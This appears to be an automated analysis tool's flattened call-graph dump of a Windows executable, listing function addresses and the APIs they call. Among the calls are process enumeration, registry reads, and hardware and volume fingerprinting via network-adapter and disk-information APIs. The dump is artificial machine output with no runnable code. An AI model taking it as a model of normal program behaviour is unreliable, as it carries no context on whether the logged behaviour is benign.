32481 45af26 32480->32481 32482 45af23 InterlockedIncrement 32480->32482 32483 45af30 InterlockedIncrement 32481->32483 32484 45af33 32481->32484 32482->32481 32483->32484 32485 45af40 32484->32485 32486 45af3d InterlockedIncrement 32484->32486 32487 45af4a InterlockedIncrement 32485->32487 32489 45af4d 32485->32489 32486->32485 32487->32489 32488 45af66 InterlockedIncrement 32488->32489 32489->32488 32490 45af81 InterlockedIncrement 32489->32490 32491 45af76 InterlockedIncrement 32489->32491 32490->32437 32491->32489 32497 457d22 LeaveCriticalSection 32492->32497 32494 457385 32494->32439 32495->32429 32496->32479 32497->32494 32499 457212 ___set_flsgetvalue 9 API calls 32498->32499 32500 451f4e __threadstartex@4 32499->32500 32513 4571f2 TlsGetValue 32500->32513 32503 451f87 32526 45741a 78 API calls 6 library calls 32503->32526 32505 451f5d __threadstartex@4 32525 457246 7 API calls __decode_pointer 32505->32525 32506 451fa2 __IsNonwritableInCurrentImage 32515 451f02 32506->32515 32508 451f6c 32510 451f70 GetLastError ExitThread 32508->32510 32511 451f7d GetCurrentThreadId 32508->32511 32511->32506 32514 451f59 32513->32514 32514->32503 32514->32505 32516 451f0e _realloc 32515->32516 32517 457400 __getptd 69 API calls 32516->32517 32518 451f13 32517->32518 32527 419eb0 32518->32527 32525->32508 32526->32506 32528 419ec0 32527->32528 32529 419eca 32527->32529 32538 419ee0 32528->32538 32531 451ec5 32529->32531 32532 451ed3 __IsNonwritableInCurrentImage 32531->32532 32533 457387 __getptd_noexit 69 API calls 32532->32533 32534 451eed 32533->32534 32535 451ef8 ExitThread 32534->32535 32553 457549 32534->32553 32539 419ef2 32538->32539 32542 419efa 32538->32542 32550 41a050 SetThreadPriority 32539->32550 32541 419f4d 32543 419f92 32541->32543 32545 419f64 32541->32545 32542->32541 32547 41a0c0 32542->32547 32551 41a010 CloseHandle 32543->32551 32545->32529 32552 4edeb0 CoUninitialize 32547->32552 32549 41a0c8 32549->32541 32550->32542 32551->32545 32552->32549 32554 457557 32553->32554 32555 4575a2 32553->32555 32558 45755d TlsGetValue 32554->32558 32561 457580 32554->32561 32556 451ef7 32555->32556 32557 4575ac TlsSetValue 32555->32557 32556->32535 32557->32556 32560 457570 TlsGetValue 32558->32560 32558->32561 32559 457177 __decode_pointer 7 API calls 32562 457597 32559->32562 32560->32561 32561->32559 32564 45741a 78 API calls 6 library calls 32562->32564 32564->32555 32713 423300 32716 491a00 32713->32716 32717 491a43 32716->32717 32722 42331a 32716->32722 32717->32722 32725 490300 32717->32725 32719 491a5c 32720 491abd 32719->32720 32724 491a67 32719->32724 32721 491160 102 API calls 32720->32721 32721->32722 32724->32722 32733 491160 32724->32733 32726 490333 _Immortalize 32725->32726 32727 490378 _Immortalize 32726->32727 32739 4901a0 32726->32739 32727->32719 32730 4181d0 _Immortalize 77 API calls 32731 490369 32730->32731 32732 4176e0 codecvt 69 API calls 32731->32732 32732->32727 32734 491177 32733->32734 32735 49116d 32733->32735 32777 4fc3d0 32734->32777 32749 4908a0 GetTickCount 32735->32749 32742 490070 32739->32742 32743 4900c3 32742->32743 32744 4900a1 32742->32744 32743->32730 32745 44f76f _Allocate 77 API calls 32744->32745 32746 4900a8 32745->32746 32746->32743 32748 432510 77 API calls 32746->32748 32748->32743 32751 4908e0 _Immortalize 32749->32751 32750 4908f4 32753 44f6c8 __putwch_nolock 5 API calls 32750->32753 32751->32750 32752 4175c0 _Immortalize 69 API calls 32751->32752 32754 49091d _Immortalize 32752->32754 32755 490ac8 32753->32755 32756 4175c0 _Immortalize 69 API calls 32754->32756 32755->32734 32757 490938 32756->32757 32758 49094d 32757->32758 32849 405140 32757->32849 32786 4903a0 32758->32786 32761 490a6f 32762 4176e0 codecvt 69 API calls 32761->32762 32764 490a9e 32762->32764 32763 490962 _Immortalize 32763->32761 32853 45508b 32763->32853 32765 4176e0 codecvt 69 API calls 32764->32765 32765->32750 32769 4909ae 32769->32761 32857 455a52 80 API calls 2 library calls 32769->32857 32771 4909c5 _Immortalize 32771->32761 32772 417910 _Immortalize 77 API calls 32771->32772 32773 490a4d 32772->32773 32774 4181d0 _Immortalize 77 API calls 32773->32774 32775 490a60 32774->32775 32776 4176e0 codecvt 69 API calls 32775->32776 32776->32761 32778 4fc3e8 32777->32778 32779 4fc3e0 32777->32779 32784 491183 32778->32784 32902 4fc240 32778->32902 32780 4fc3e6 32779->32780 32781 4fc402 32779->32781 32780->32784 32926 4fc180 32780->32926 32781->32784 32914 4fc300 32781->32914 32784->32724 32787 4903d9 std::_Iterator_base::_Iterator_base 32786->32787 32788 417a20 _Immortalize 77 API calls 32787->32788 32789 4903ef 32788->32789 32790 417a20 _Immortalize 77 API calls 32789->32790 32791 4903fe _Immortalize 32790->32791 32792 4175c0 _Immortalize 69 API calls 32791->32792 32793 490412 32792->32793 32794 494f20 6 API calls 32793->32794 32795 49041b _Immortalize 32794->32795 32797 49052c codecvt _Immortalize 32795->32797 32858 443050 CoCreateInstance 32795->32858 32798 41eea0 2 API calls 32797->32798 32800 4905fc _Immortalize 32797->32800 32802 49055f _memset 32798->32802 32799 49083b _Immortalize 32807 4176e0 codecvt 69 API calls 32799->32807 32800->32799 32801 4130d0 _Immortalize 77 API calls 32800->32801 32803 49061c _Immortalize 32801->32803 32802->32800 32806 41ede0 RegQueryValueExW 32802->32806 32810 41eea0 2 API calls 32803->32810 32804 490443 Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 32804->32797 32859 494f40 32804->32859 32814 4905b0 _Immortalize 32806->32814 32808 490862 32807->32808 32811 41ef60 RegCloseKey 32808->32811 32809 4905f4 32812 41ef10 RegCloseKey 32809->32812 32819 490634 _memset 32810->32819 32813 490871 32811->32813 32812->32800 32815 44f6c8 __putwch_nolock 5 API calls 32813->32815 32814->32809 32816 417910 _Immortalize 77 API calls 32814->32816 32817 49088c 32815->32817 32818 4905d2 32816->32818 32817->32763 32820 4181d0 _Immortalize 77 API calls 32818->32820 32819->32799 32821 41ede0 RegQueryValueExW 32819->32821 32822 4905e5 32820->32822 32823 490685 32821->32823 32824 4176e0 codecvt 69 API calls 32822->32824 32825 41ef10 RegCloseKey 32823->32825 32824->32809 32836 49068d _Immortalize 32825->32836 32826 49046c _Immortalize Concurrency::details::ThreadVirtualProcessor::ThreadVirtualProcessor 32826->32797 32827 417910 _Immortalize 77 API calls 32826->32827 32828 490500 32827->32828 32829 4181d0 _Immortalize 77 API calls 32828->32829 32830 490513 32829->32830 32831 4176e0 codecvt 69 API calls 32830->32831 32832 490522 CoTaskMemFree 32831->32832 32832->32797 32833 4907eb _Immortalize 32835 417910 _Immortalize 77 API calls 32833->32835 32834 4907aa _Immortalize 32834->32833 32838 4907dc 32834->32838 32841 4130d0 _Immortalize 77 API calls 32834->32841 32837 490819 32835->32837 32836->32834 32839 417910 _Immortalize 77 API calls 32836->32839 32840 4181d0 _Immortalize 77 API calls 32837->32840 32842 4130d0 _Immortalize 77 API calls 32838->32842 32843 490788 32839->32843 32844 49082c 32840->32844 32841->32838 32842->32833 32845 4181d0 _Immortalize 77 API calls 32843->32845 32846 4176e0 codecvt 69 API calls 32844->32846 32847 49079b 32845->32847 32846->32799 32848 4176e0 codecvt 69 API calls 32847->32848 32848->32834 32850 405155 32849->32850 32868 406c00 32850->32868 32852 405193 32852->32758 32872 454e70 32853->32872 32856 452266 81 API calls 2 library calls 32856->32769 32857->32771 32858->32804 32862 494af0 32859->32862 32863 494b3d 32862->32863 32864 494b0c GetVersionExW 32862->32864 32866 44f6c8 __putwch_nolock 5 API calls 32863->32866 32864->32863 32865 494b28 32864->32865 32865->32863 32867 494b4c 32866->32867 32867->32826 32869 406c15 32868->32869 32870 417a20 _Immortalize 77 API calls 32869->32870 32871 406c60 _DebugHeapAllocator _Immortalize 32870->32871 32871->32852 32873 454e89 32872->32873 32874 454f0a 32872->32874 32873->32874 32888 454ef8 32873->32888 32894 455ffc 69 API calls __wcsnicmp 32873->32894 32875 455056 32874->32875 32876 45503b 32874->32876 32900 454477 69 API calls __getptd_noexit 32875->32900 32898 454477 69 API calls __getptd_noexit 32876->32898 32879 455040 32884 454fd6 32879->32884 32899 4557a5 7 API calls 2 library calls 32879->32899 32882 454fde 32882->32874 32882->32884 32886 455069 32882->32886 32883 454f94 32883->32874 32885 454fb1 32883->32885 32896 455ffc 69 API calls __wcsnicmp 32883->32896 32884->32856 32885->32874 32885->32884 32890 454fca 32885->32890 32901 455ffc 69 API calls __wcsnicmp 32886->32901 32888->32874 32893 454f76 32888->32893 32895 455ffc 69 API calls __wcsnicmp 32888->32895 32897 455ffc 69 API calls __wcsnicmp 32890->32897 32893->32882 32893->32883 32894->32888 32895->32893 32896->32885 32897->32884 32898->32879 32900->32879 32901->32884 32938 484b40 32902->32938 32905 4fc2b1 32908 44f76f _Allocate 77 API calls 32905->32908 32906 4fc271 32907 44f76f _Allocate 77 API calls 32906->32907 32910 4fc278 32907->32910 32909 4fc2b8 32908->32909 32911 4fc293 32909->32911 32951 484c00 77 API calls 32909->32951 32910->32911 32950 442f10 69 API calls _Immortalize 32910->32950 32911->32784 32984 48c830 32914->32984 32917 4fc371 32920 44f76f _Allocate 77 API calls 32917->32920 32918 4fc331 32919 44f76f _Allocate 77 API calls 32918->32919 32921 4fc338 32919->32921 32922 4fc37b 32920->32922 32925 4fc353 32921->32925 33007 442f10 69 API calls _Immortalize 32921->33007 32922->32925 33008 48c180 77 API calls 32922->33008 32925->32784 32927 47f670 72 API calls 32926->32927 32928 4fc1ac 32927->32928 32929 4fc1f3 32928->32929 32930 4fc1b3 32928->32930 32931 44f76f _Allocate 77 API calls 32929->32931 32932 44f76f _Allocate 77 API calls 32930->32932 32933 4fc1fa 32931->32933 32934 4fc1ba 32932->32934 32935 4fc1d5 32933->32935 33027 442e40 69 API calls 2 library calls 32933->33027 32934->32935 33026 442f10 69 API calls _Immortalize 32934->33026 32935->32784 32939 484b70 _Immortalize 32938->32939 32940 4175c0 _Immortalize 69 API calls 32939->32940 32941 484b79 32940->32941 32952 484b20 32941->32952 32944 484b9b 32946 4176e0 codecvt 69 API calls 32944->32946 32945 49e7e0 _Immortalize 71 API calls 32945->32944 32947 484bca 32946->32947 32948 44f6c8 __putwch_nolock 5 API calls 32947->32948 32949 484be2 32948->32949 32949->32905 32949->32906 32950->32911 32951->32911 32955 495e20 32952->32955 32956 495e53 _Immortalize std::_Iterator_base::_Iterator_base 32955->32956 32957 417910 _Immortalize 77 API calls 32956->32957 32958 495e73 32957->32958 32959 4130d0 _Immortalize 77 API calls 32958->32959 32960 495e83 _Immortalize 32959->32960 32961 41eea0 2 API calls 32960->32961 32964 495e9b _memset 32961->32964 32962 495fa5 32963 4176e0 codecvt 69 API calls 32962->32963 32965 495fbb 32963->32965 32964->32962 32966 41ede0 RegQueryValueExW 32964->32966 32967 41ef60 RegCloseKey 32965->32967 32969 495ee7 32966->32969 32968 495f9d 32967->32968 32970 44f6c8 __putwch_nolock 5 API calls 32968->32970 32969->32962 32972 495eef _wcslen 32969->32972 32971 484b31 32970->32971 32971->32944 32971->32945 32973 495f24 PathAddBackslashW 32972->32973 32974 495f3c _Immortalize 32973->32974 32975 417910 _Immortalize 77 API calls 32974->32975 32976 495f4f 32975->32976 32977 4181d0 _Immortalize 77 API calls 32976->32977 32978 495f62 32977->32978 32979 4176e0 codecvt 69 API calls 32978->32979 32980 495f71 _Immortalize 32979->32980 32981 4176e0 codecvt 69 API calls 32980->32981 32982 495f8e 32981->32982 32983 41ef60 RegCloseKey 32982->32983 32983->32968 32985 48c860 _Immortalize 32984->32985 32986 4175c0 _Immortalize 69 API calls 32985->32986 32987 48c869 32986->32987 33009 48bd40 32987->33009 32989 48c879 32990 48c90c 32989->32990 32991 48c884 32989->32991 32992 4176e0 codecvt 69 API calls 32990->32992 32993 4098d0 _Immortalize 77 API calls 32991->32993 33006 48c907 32992->33006 32994 48c8af 32993->32994 32997 409810 _Immortalize 77 API calls 32994->32997 32995 44f6c8 __putwch_nolock 5 API calls 32996 48c937 32995->32996 32996->32917 32996->32918 32998 48c8cb 32997->32998 32999 49e7e0 _Immortalize 71 API calls 32998->32999 33000 48c8da 32999->33000 33001 4176e0 codecvt 69 API calls 33000->33001 33002 48c8ec 33001->33002 33003 4178c0 codecvt 69 API calls 33002->33003 33004 48c8f8 33003->33004 33005 4176e0 codecvt 69 API calls 33004->33005 33005->33006 33006->32995 33007->32925 33008->32925 33010 495e20 81 API calls 33009->33010 33011 48bd73 33010->33011 33012 495d00 80 API calls 33011->33012 33025 48bd7a _Immortalize 33011->33025 33013 48bd99 33012->33013 33014 4130d0 _Immortalize 77 API calls 33013->33014 33013->33025 33015 48bdb9 33014->33015 33016 4098d0 _Immortalize 77 API calls 33015->33016 33017 48bde3 33016->33017 33018 409810 _Immortalize 77 API calls 33017->33018 33019 48be02 33018->33019 33020 49e7e0 _Immortalize 71 API calls 33019->33020 33021 48be11 33020->33021 33022 4176e0 codecvt 69 API calls 33021->33022 33023 48be23 33022->33023 33024 4178c0 codecvt 69 API calls 33023->33024 33024->33025 33025->32989 33026->32935 33027->32935 33053 404430 33054 404451 33053->33054 33066 40444c 33053->33066 33067 403a70 9 API calls 33054->33067 33056 404472 33057 4044a5 33056->33057 33056->33066 33099 4f3610 205 API calls 4 library calls 33056->33099 33058 4044df 33057->33058 33057->33066 33100 4efcd0 SetWindowPos 33057->33100 33061 404519 33058->33061 33058->33066 33068 4f3ed0 33058->33068 33065 404553 33061->33065 33061->33066 33101 4f0410 83 API calls _Immortalize 33061->33101 33065->33066 33102 4efc10 ShowWindow DestroyWindow codecvt 33065->33102 33067->33056 33073 4f3f03 33068->33073 33069 4f4069 33129 4049b0 76 API calls _Immortalize 33069->33129 33071 4f3fae 33071->33069 33077 4f405a 33071->33077 33103 4049b0 76 API calls _Immortalize 33071->33103 33072 4f406e 33130 4049b0 76 API calls _Immortalize 33072->33130 33073->33071 33074 4f3f5c 33073->33074 33075 4f3f7a 33073->33075 33122 417430 VariantClear 33074->33122 33076 4f3f94 33075->33076 33123 4161a0 IsWindow 33075->33123 33124 417430 VariantClear 33076->33124 33128 417430 VariantClear 33077->33128 33081 4f3f72 33081->33061 33085 4f4002 33104 4e40d0 33085->33104 33086 4f407f 33131 415f10 DestroyWindow 33086->33131 33090 4f4098 33092 4f40ba 33090->33092 33094 4f40a6 PostMessageW 33090->33094 33091 4f4020 33125 4049b0 76 API calls _Immortalize 33091->33125 33092->33081 33094->33092 33095 4f4027 33126 415f30 SetFocus 33095->33126 33097 4f403f 33127 417430 VariantClear 33097->33127 33099->33057 33100->33058 33101->33065 33102->33066 33103->33085 33132 424aa0 85 API calls _Immortalize 33104->33132 33106 4e4106 33133 4cd7c0 119 API calls 33106->33133 33108 4e411c 33134 4cd7f0 119 API calls 33108->33134 33110 4e412e 33135 425e10 22 API calls _Immortalize 33110->33135 33112 4e4159 33113 4e4190 33112->33113 33114 4e4160 33112->33114 33166 424d70 71 API calls codecvt 33113->33166 33136 4e2680 33114->33136 33118 4e4188 33120 44f6c8 __putwch_nolock 5 API calls 33118->33120 33121 4e41c7 33120->33121 33121->33077 33121->33091 33122->33081 33123->33076 33124->33071 33125->33095 33126->33097 33127->33081 33128->33069 33129->33072 33130->33086 33131->33090 33132->33106 33133->33108 33134->33110 33135->33112 33167 4dc1b0 79 API calls 4 library calls 33136->33167 33138 4e26b6 _Immortalize 33139 4e26e1 33138->33139 33400 4cb860 77 API calls _Immortalize 33138->33400 33168 4099f0 77 API calls 33139->33168 33142 4e2708 33143 4e2726 33142->33143 33144 4e2712 33142->33144 33169 4dffd0 33143->33169 33145 4176e0 codecvt 69 API calls 33144->33145 33147 4e2721 33145->33147 33149 44f6c8 __putwch_nolock 5 API calls 33147->33149 33150 4e2814 33149->33150 33165 424d70 71 API calls codecvt 33150->33165 33165->33118 33166->33118 33167->33138 33168->33142 33170 4e000d _Immortalize 33169->33170 33171 4175c0 _Immortalize 69 API calls 33170->33171 33172 4e0016 _Immortalize 33171->33172 33173 4175c0 _Immortalize 69 API calls 33172->33173 33174 4e002e 33173->33174 33409 4d6610 33174->33409 33181 4178c0 codecvt 69 API calls 33182 4e00a6 33181->33182 33430 4fdb00 33182->33430 33185 4181d0 _Immortalize 77 API calls 33186 4e00da 33185->33186 33187 4176e0 codecvt 69 API calls 33186->33187 33188 4e00e9 _Immortalize 33187->33188 33189 4e0166 33188->33189 33193 409760 77 API calls 33188->33193 33502 4228a0 33189->33502 33195 4e012f 33193->33195 33196 405120 77 API calls 33195->33196 33197 4e0157 33196->33197 33199 4178c0 codecvt 69 API calls 33197->33199 33198 409760 77 API calls 33200 4e01d7 33198->33200 33199->33189 33201 405120 77 API calls 33200->33201 33202 4e01ff 33201->33202 33203 4178c0 codecvt 69 API calls 33202->33203 33204 4e020e 33203->33204 33205 4176e0 codecvt 69 API calls 33204->33205 33206 4e021d _Immortalize 33205->33206 33207 417910 _Immortalize 77 API calls 33206->33207 33208 4e0239 33207->33208 33528 4f4dc0 33208->33528 33210 4e0284 33211 4098d0 _Immortalize 77 API calls 33210->33211 33212 4e0298 33211->33212 33213 405120 77 API calls 33212->33213 33214 4e02c0 33213->33214 33215 4178c0 codecvt 69 API calls 33214->33215 33216 4e02cf 33215->33216 33217 4176e0 codecvt 69 API calls 33216->33217 33218 4e02de 33217->33218 33536 49d9c0 CreateToolhelp32Snapshot 33218->33536 33221 49d9c0 10 API calls 33222 4e02f2 33221->33222 33546 496160 33222->33546 33224 4e03d1 _Immortalize 33227 417910 _Immortalize 77 API calls 33224->33227 33225 4e02fb _Immortalize 33225->33224 33226 417910 _Immortalize 77 API calls 33225->33226 33231 4e0322 _Immortalize 33226->33231 33228 4e03ed 33227->33228 33569 501ce0 33228->33569 33233 4e0370 PathFindFileNameW 33231->33233 33235 4098d0 _Immortalize 77 API calls 33233->33235 33237 4e038b 33235->33237 33239 405120 77 API calls 33237->33239 33241 4e03b3 33239->33241 33243 4178c0 codecvt 69 API calls 33241->33243 33242 4e0434 33615 4dcb20 33242->33615 33244 4e03c2 33243->33244 33245 4176e0 codecvt 69 API calls 33244->33245 33245->33224 33247 4e045d _Immortalize 33624 48cc50 33247->33624 33252 47f670 72 API calls 33253 4e0489 33252->33253 33254 416600 111 API calls 33253->33254 33255 4e049b 33254->33255 33256 4176e0 codecvt 69 API calls 33255->33256 33400->33139 33410 4d663d _Immortalize 33409->33410 33411 417910 _Immortalize 77 API calls 33410->33411 33412 4d664b 33411->33412 33413 4181d0 _Immortalize 77 API calls 33412->33413 33414 4d665e 33413->33414 33415 4176e0 codecvt 69 API calls 33414->33415 33416 4d666d 33415->33416 33417 409760 33416->33417 33958 4050e0 33417->33958 33420 405120 77 API calls 33421 4097b4 33420->33421 33422 417620 allocator 77 API calls 33421->33422 33423 4097bd 33422->33423 33424 4178c0 codecvt 69 API calls 33423->33424 33425 4097d2 33424->33425 33426 409880 33425->33426 33427 409891 _Immortalize 33426->33427 33964 4163a0 33427->33964 33431 4fdb3d _Immortalize 33430->33431 33432 4175c0 _Immortalize 69 API calls 33431->33432 33433 4fdb46 _Immortalize 33432->33433 33434 4175c0 _Immortalize 69 API calls 33433->33434 33435 4fdb5e 33434->33435 33971 4fd9e0 33435->33971 33438 4181d0 _Immortalize 77 API calls 33439 4fdb93 33438->33439 33440 4176e0 codecvt 69 API calls 33439->33440 33441 4fdb9f _Immortalize 33440->33441 33442 4fdc1c 33441->33442 33446 409760 77 API calls 33441->33446 33976 4fda50 33442->33976 33445 4181d0 _Immortalize 77 API calls 33447 4fdc52 33445->33447 33448 4fdbe5 33446->33448 33449 4176e0 codecvt 69 API calls 33447->33449 33450 409880 77 API calls 33448->33450 33457 4fdc61 _Immortalize 33449->33457 33451 4fdc0d 33450->33451 33452 4178c0 codecvt 69 API calls 33451->33452 33452->33442 33453 4fdcfe 33454 490220 76 API calls 33453->33454 33455 4fdd11 33454->33455 33456 4901a0 77 API calls 33455->33456 33459 4fdd18 33456->33459 33457->33453 33458 4fdc90 33457->33458 33460 4130d0 _Immortalize 77 API calls 33457->33460 33462 409760 77 API calls 33458->33462 33461 4181d0 _Immortalize 77 API calls 33459->33461 33460->33458 33463 4fdd3d 33461->33463 33465 4fdcc7 33462->33465 33464 4176e0 codecvt 69 API calls 33463->33464 33473 4fdd4c _Immortalize 33464->33473 33466 405120 77 API calls 33465->33466 33467 4fdcef 33466->33467 33468 4178c0 codecvt 69 API calls 33467->33468 33468->33453 33469 4fdde9 33470 490220 76 API calls 33469->33470 33471 4fddfc 33470->33471 33472 4901a0 77 API calls 33471->33472 33475 4fde03 33472->33475 33473->33469 33474 4fdd7b 33473->33474 33476 4130d0 _Immortalize 77 API calls 33473->33476 33479 409760 77 API calls 33474->33479 33477 4181d0 _Immortalize 77 API calls 33475->33477 33476->33474 33478 4fde28 33477->33478 33480 4176e0 codecvt 69 API calls 33478->33480 33481 4fddb2 33479->33481 33485 4fde37 _Immortalize 33480->33485 33482 405120 77 API calls 33481->33482 33483 4fddda 33482->33483 33484 4178c0 codecvt 69 API calls 33483->33484 33484->33469 33486 4fde53 33485->33486 33487 4130d0 _Immortalize 77 API calls 33485->33487 33488 409760 77 API calls 33486->33488 33487->33486 33489 4fde8a 33488->33489 33490 405120 77 API calls 33489->33490 33491 4fdeb2 33490->33491 33492 4178c0 codecvt 69 API calls 33491->33492 33493 4fdec1 33492->33493 33494 417660 allocator 77 API calls 33493->33494 33495 4fdecd 33494->33495 33496 4176e0 codecvt 69 API calls 33495->33496 33497 4fdee8 33496->33497 33498 4176e0 codecvt 69 API calls 33497->33498 33499 4fdef4 33498->33499 33500 44f6c8 __putwch_nolock 5 API calls 33499->33500 33501 4e00b2 33500->33501 33501->33185 33503 4228cc 33502->33503 33507 4228f6 33502->33507 33990 422840 33503->33990 33506 44fae5 _Immortalize 76 API calls 33506->33507 33508 483530 33507->33508 33509 48356d _Immortalize 33508->33509 33510 483600 33509->33510 33994 483240 33509->33994 33512 417660 allocator 77 API calls 33510->33512 33514 48360c 33512->33514 33515 44f6c8 __putwch_nolock 5 API calls 33514->33515 33517 483634 33515->33517 33517->33198 33518 48358f _Immortalize 33519 4835cb _Immortalize 33518->33519 33520 4835a5 33518->33520 33524 416600 111 API calls 33519->33524 34016 4832f0 6 API calls __putwch_nolock 33520->34016 33522 4835ad 33523 416600 111 API calls 33522->33523 33525 4835c6 33523->33525 33526 4835f1 33524->33526 33525->33526 33527 4176e0 codecvt 69 API calls 33526->33527 33527->33510 33529 4f4dec 33528->33529 33533 4f4e16 _Immortalize 33528->33533 34019 4f4b50 33529->34019 33532 44fae5 _Immortalize 76 API calls 33532->33533 33535 4f4e3b _Immortalize 33533->33535 34023 4f4bc0 33533->34023 33535->33210 33537 49da8b 33536->33537 33538 49d9f0 33536->33538 33541 44f6c8 __putwch_nolock 5 API calls 33537->33541 33539 49da09 Process32FirstW 33538->33539 33540 49da00 GetCurrentProcessId 33538->33540 33544 49da24 33539->33544 33540->33539 33542 49da98 33541->33542 33542->33221 33543 49da81 FindCloseChangeNotification 33543->33537 33544->33543 33545 49da49 Process32NextW 33544->33545 33545->33544 33547 4961ab _memset _Immortalize 33546->33547 33548 417910 _Immortalize 77 API calls 33547->33548 33549 4961ca 33548->33549 33550 4181d0 _Immortalize 77 API calls 33549->33550 33551 4961e0 33550->33551 33552 4176e0 codecvt 69 API calls 33551->33552 33553 4961f2 OpenProcess 33552->33553 33554 496210 EnumProcessModules 33553->33554 33555 4962ce _Immortalize 33553->33555 33556 49625f GetProcessImageFileNameW 33554->33556 33557 496241 GetModuleFileNameExW K32GetModuleFileNameExW 33554->33557 33558 44f6c8 __putwch_nolock 5 API calls 33555->33558 33559 496278 CloseHandle 33556->33559 33560 496286 _Immortalize 33556->33560 33557->33556 33561 4962fc 33558->33561 33559->33555 33562 417910 _Immortalize 77 API calls 33560->33562 33561->33225 33563 4962a4 33562->33563 33564 4181d0 _Immortalize 77 API calls 33563->33564 33565 4962ba 33564->33565 33566 4176e0 codecvt 69 API calls 33565->33566 33567 4962cc FindCloseChangeNotification 33566->33567 33567->33555 34041 41c3a0 33569->34041 33572 501530 34061 41c9d0 33572->34061 33574 50156f codecvt 33575 5015b4 33574->33575 33576 50158b 33574->33576 34067 41c1b0 69 API calls _Immortalize 33575->34067 34066 41c470 77 API calls allocator 33576->34066 33578 4e040b 33580 490220 33578->33580 34090 442fa0 33580->34090 33583 490d50 33584 490d93 _Immortalize 33583->33584 33585 4175c0 _Immortalize 69 API calls 33584->33585 33586 490d9c 33585->33586 33587 4908a0 96 API calls 33586->33587 33588 490db2 33587->33588 33589 490dd8 _Immortalize 33588->33589 33590 490dc1 33588->33590 33592 417910 _Immortalize 77 API calls 33589->33592 33591 490e0c _Immortalize 33590->33591 33595 490dca _Immortalize 33590->33595 33594 417910 _Immortalize 77 API calls 33591->33594 33596 490dee 33592->33596 33593 417660 allocator 77 API calls 33597 490e8a 33593->33597 33598 490e22 33594->33598 33599 417910 _Immortalize 77 API calls 33595->33599 33610 490dd3 33595->33610 33600 4181d0 _Immortalize 77 API calls 33596->33600 33601 4176e0 codecvt 69 API calls 33597->33601 33602 4181d0 _Immortalize 77 API calls 33598->33602 33603 490e5c 33599->33603 33604 490dfe 33600->33604 33607 490ea5 33601->33607 33608 490e32 33602->33608 33605 4181d0 _Immortalize 77 API calls 33603->33605 33606 4176e0 codecvt 69 API calls 33604->33606 33609 490e6f 33605->33609 33606->33610 33611 44f6c8 __putwch_nolock 5 API calls 33607->33611 33612 4176e0 codecvt 69 API calls 33608->33612 33613 4176e0 codecvt 69 API calls 33609->33613 33610->33593 33614 490ebd 33611->33614 33612->33610 33613->33610 33614->33242 33616 490220 76 API calls 33615->33616 33617 4dcb2d 33616->33617 34097 491fb0 33617->34097 33620 4dcb49 33620->33247 33621 490220 76 API calls 33622 4dcb42 33621->33622 34170 491190 33622->34170 33625 48cc82 33624->33625 33629 48cc9d std::_Iterator_base::_Iterator_base 33624->33629 33626 48c830 86 API calls 33625->33626 33626->33629 33627 48ccbc 33628 44f6c8 __putwch_nolock 5 API calls 33627->33628 33631 48cdc6 33628->33631 33629->33627 33630 41eea0 2 API calls 33629->33630 33632 48cce9 33630->33632 33650 484ea0 33631->33650 33633 48cced _memset 33632->33633 33634 48cd36 _Immortalize 33632->33634 33635 41ede0 RegQueryValueExW 33633->33635 33636 4175c0 _Immortalize 69 API calls 33634->33636 33637 48cd1f 33635->33637 33638 48cd47 33636->33638 34283 451cbd 80 API calls wcstoxl 33637->34283 34258 48c630 33638->34258 33641 48cd2c 33645 41ef60 RegCloseKey 33641->33645 33642 48cd54 33645->33627 33651 484ed2 33650->33651 33656 484eed std::_Iterator_base::_Iterator_base 33650->33656 33652 484b40 83 API calls 33651->33652 33652->33656 33653 484f8b 33654 44f6c8 __putwch_nolock 5 API calls 33653->33654 33655 484fa5 33654->33655 33655->33252 33656->33653 33657 41eea0 2 API calls 33656->33657 33660 484f2f _memset 33657->33660 33658 484f74 33659 41ef60 RegCloseKey 33658->33659 33659->33653 33660->33658 33661 41ede0 RegQueryValueExW 33660->33661 33662 484f67 33661->33662 34358 451cbd 80 API calls wcstoxl 33662->34358 33959 4050f1 _Immortalize 33958->33959 33960 417e70 codecvt 69 API calls 33959->33960 33961 405105 33960->33961 33962 417850 _Immortalize 77 API calls 33961->33962 33963 405111 33962->33963 33963->33420 33965 4163c2 33964->33965 33966 4163ad 33964->33966 33970 416560 77 API calls std::ios_base::clear 33965->33970 33967 4177a0 std::locale::_Locimp::_Addfac 77 API calls 33966->33967 33969 4098a3 33967->33969 33969->33181 33970->33969 33972 490220 76 API calls 33971->33972 33973 4fda1a 33972->33973 33974 4901a0 77 API calls 33973->33974 33975 4fda21 33974->33975 33975->33438 33977 490220 76 API calls 33976->33977 33978 4fda8f 33977->33978 33979 4901a0 77 API calls 33978->33979 33980 4fda96 _Immortalize 33979->33980 33987 4fdabd 33980->33987 33989 4fc760 111 API calls 3 library calls 33980->33989 33981 417660 allocator 77 API calls 33982 4fdacc 33981->33982 33983 4176e0 codecvt 69 API calls 33982->33983 33984 4fdae1 33983->33984 33986 44f6c8 __putwch_nolock 5 API calls 33984->33986 33988 4fdaf9 33986->33988 33987->33981 33988->33445 33989->33987 33991 422870 _Immortalize 33990->33991 33992 4175c0 _Immortalize 69 API calls 33991->33992 33993 422879 33992->33993 33993->33506 34017 451d90 33994->34017 33996 48327c GetSystemDirectoryW 33997 45508b __wsplitpath 69 API calls 33996->33997 33998 4832b6 PathAddBackslashW GetVolumeInformationW 33997->33998 33999 44f6c8 __putwch_nolock 5 API calls 33998->33999 34000 4832ea 33999->34000 34001 483370 GetAdaptersAddresses 34000->34001 34002 44fbd9 _malloc 69 API calls 34001->34002 34003 4833dd 34002->34003 34004 483412 GetAdaptersAddresses 34003->34004 34006 4833e9 _Immortalize 34003->34006 34005 4834c7 34004->34005 34013 48342d 34004->34013 34007 44fafc ___free_lc_time 69 API calls 34005->34007 34009 4175c0 _Immortalize 69 API calls 34006->34009 34008 4834de _Immortalize 34007->34008 34011 417910 _Immortalize 77 API calls 34008->34011 34010 4833fa 34009->34010 34012 44f6c8 __putwch_nolock 5 API calls 34010->34012 34011->34010 34014 48351e 34012->34014 34013->34005 34015 48349d wsprintfW 34013->34015 34014->33518 34015->34013 34016->33522 34018 451d9c __VEC_memzero 34017->34018 34018->33996 34020 4f4b89 _Immortalize 34019->34020 34021 4175c0 _Immortalize 69 API calls 34020->34021 34022 4f4b95 34021->34022 34022->33532 34024 4f4bdb _memset __write_nolock 34023->34024 34025 4f4c02 GetVolumeInformationW 34024->34025 34026 451d90 _memset 34025->34026 34027 4f4c49 GetAdaptersInfo 34026->34027 34028 4f4c60 _memset 